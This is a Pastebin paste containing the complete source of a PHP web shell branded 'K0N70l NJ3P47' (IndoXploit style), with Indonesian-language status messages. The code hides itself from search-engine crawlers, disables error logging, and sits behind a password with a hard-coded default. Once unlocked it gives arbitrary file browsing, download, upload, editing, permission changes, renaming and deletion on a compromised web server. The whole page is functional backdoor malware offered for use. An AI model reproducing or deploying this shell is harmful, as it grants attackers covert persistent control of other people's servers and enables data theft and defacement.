Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- error_reporting(0);
- set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @clearstatcache();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- $auth_pass = "40fa73c9d0083043c6576dd2b40511e4"; // default: net
- $color = "#00ff00";
- $default_action = 'FilesMan';
- $default_use_ajax = true;
- $default_charset = 'UTF-8';
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- function login_shell() {
- ?>
- <embed src="http://www.youtube.com/v/nGsESTQOPkQ&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
- <html>
- <head>
- <title>K0N70l NJ3P47</title>
- <style type="text/css">
- html {
- margin: 20px auto;
- background: #000000;
- color: green;
- text-align: center;
- }
- header {
- color: green;
- margin: 10px auto;
- }
- input[type=password] {
- width: 250px;
- height: 25px;
- color: red;
- background: #000000;
- border: 1px dotted green;
- padding: 5px;
- margin-left: 20px;
- text-align: center;
- }
- .kedip {
- -webkit-animation-name: blinker;
- -webkit-animation-duration: 3s;
- -webkit-animation-timing-function: linear;
- -webkit-animation-iteration-count: infinite;
- -moz-animation-name: blinker;
- -moz-animation-duration: 2s;
- -moz-animation-timing-function: linear;
- -moz-animation-iteration-count: infinite;
- animation-name: blinker;
- animation-duration: 1s;
- animation-timing-function: linear;
- animation-iteration-count: infinite;
- color: cyan;
- }
- @-moz-keyframes blinker {
- 0% { opacity: 1.0; }
- 50% { opacity: 0.0; }
- 100% { opacity: 1.0; }
- }
- @-webkit-keyframes blinker {
- 0% { opacity: 1.0; }
- 50% { opacity: 0.0; }
- 100% { opacity: 1.0; }
- }
- @keyframes blinker {
- 0% { opacity: 1.0; }
- 50% { opacity: 0.0; }
- 100% { opacity: 1.0; }
- }
- </style>
- </head>
- <center>
- <header>
- <pre onkeydown="return false;" onmousedown="return false;" class="kedip">
- ___________________________
- < root@indoxploit:~# w00t??? >
- ---------------------------
- \ , ,
- \ /( )`
- \ \ \___ / |
- /- _ `-/ '
- (/\/ \ \ /\
- / / | ` \
- O O ) / |
- `-^--'`< '
- (_.) _ ) /
- `.___/` /
- `-----' /
- <----. __ / __ \
- <----|====O)))==) \) /====
- <----' `--' `.__,' \
- | |
- \ /
- ______( (_ / \______
- ,' ,-----' | \
- `--{__________) \/
- </pre>
- </header>
- <form method="post">
- <input type="password" name="pass">
- </form>
- <?php
- exit;
- }
- if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
- if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- login_shell();
- if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
- @ob_clean();
- $file = $_GET['file'];
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.basename($file).'"');
- header('Expires: 0');
- header('Cache-Control: must-revalidate');
- header('Pragma: public');
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit;
- }
- ?>
- <?php
- error_reporting(0);
- set_time_limit(0);
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- echo '<!DOCTYPE HTML>
- <embed src="http://www.youtube.com/v/nGsESTQOPkQ&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
- <html>
- <head>
- <link href="" rel="stylesheet" type="text/css">
- <title>K0N70l NJ3P47</title>
- <style>
- body{
- font-family: "Racing Sans One", cursive;
- <embed src="http://www.youtube.com/v/56bK56eiaDY&autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
- }
- body {
- background: url(https://scontent-sit4-1.xx.fbcdn.net/v/t1.0-9/19247898_195038844356980_794499332495513803_n.jpg?oh=6bbcb39990c39cab81c9df39dc6a09b1&oe=59F03D8B) no-repeat fixed;
- -webkit-background-size: 100% 100%;
- -moz-background-size: 100% 100%;
- -o-background-size: 100% 100%;
- background-size: 100% 100%;
- }
- color:white;
- }
- #content tr:hover{
- background-color: red;
- text-shadow:0px 0px 10px #fff;
- }
- #content .first{
- background-color: red;
- }
- table{
- border: 1px #000000 dotted;
- }
- a{
- color:white;
- text-decoration: none;
- }
- a:hover{
- color:blue;
- text-shadow:0px 0px 10px #ffffff;
- }
- input,select,textarea{
- border: 1px #000000 solid;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- </style>
- </head>
- <body>
- <h1><center><font color="aqua">K0N70l NJ3P47</font></center></h1>
- <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr><td><font color="white">Path :</font> ';
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- echo '</td></tr><tr><td>';
- if(isset($_FILES['file'])){
- if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
- echo '<font color="green">Cekrek Aplod Beres Ndro :v</font><br />';
- }else{
- echo '<font color="red">Aduh Kurang Gagah Nt Ndro :V</font><br/>';
- }
- }
- echo '<form enctype="multipart/form-data" method="POST">
- <font color="white">File Upload :</font> <input type="file" name="file" />
- <input type="submit" value="Hajar Ndro" />
- </form>
- </td></tr>';
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="green">Change Permission Berhasil</font><br/>';
- }else{
- echo '<font color="red">Change Permission Gagal</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="green">Puputan Beres Ndro</font><br/>';
- }else{
- echo '<font color="red">Duh Ora Bisa Di Hapus Ndro</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="green">Berhasil Edit File</font><br/>';
- }else{
- echo '<font color="red">Gagal Edit File</font><br/>';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Save" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br/><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="green">Directory Terhapus</font><br/>';
- }else{
- echo '<font color="red">Directory Gagal Terhapus </font><br/>';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="green">Beres Ndro</font><br/>';
- }else{
- echo '<font color="red">Aduh Sorry Ndero Gagal</font><br/>';
- }
- }
- }
- echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr class="first">
- <td><center>Name</peller></center></td>
- <td><center>Size</peller></center></td>
- <td><center>Permission</peller></center></td>
- <td><center>Modify</peller></center></td>
- </tr>';
- foreach($scandir as $dir){
- if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
- echo '<tr>
- <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
- <td><center>--</center></td>
- <td><center>';
- if(is_writable($path.'/'.$dir)) echo '<font color="green">';
- elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
- echo perms($path.'/'.$dir);
- if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- </select>
- <input type="hidden" name="type" value="dir">
- <input type="hidden" name="name" value="'.$dir.'">
- <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file($path.'/'.$file)) continue;
- $size = filesize($path.'/'.$file)/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo '<tr>
- <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
- <td><center>'.$size.'</center></td>
- <td><center>';
- if(is_writable($path.'/'.$file)) echo '<font color="green">';
- elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
- echo perms($path.'/'.$file);
- if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- <option value="edit">Edit</option>
- </select>
- <input type="hidden" name="type" value="file">
- <input type="hidden" name="name" value="'.$file.'">
- <input type="hidden" name="path" value="'.$path.'/'.$file.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo '</table>
- </div>';
- }
- echo '<center><br/>K0N70l NJ3P47 Corpright Ne7wo0ork.a.k.a ^_^ </center>
- </body>
- </html>';
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement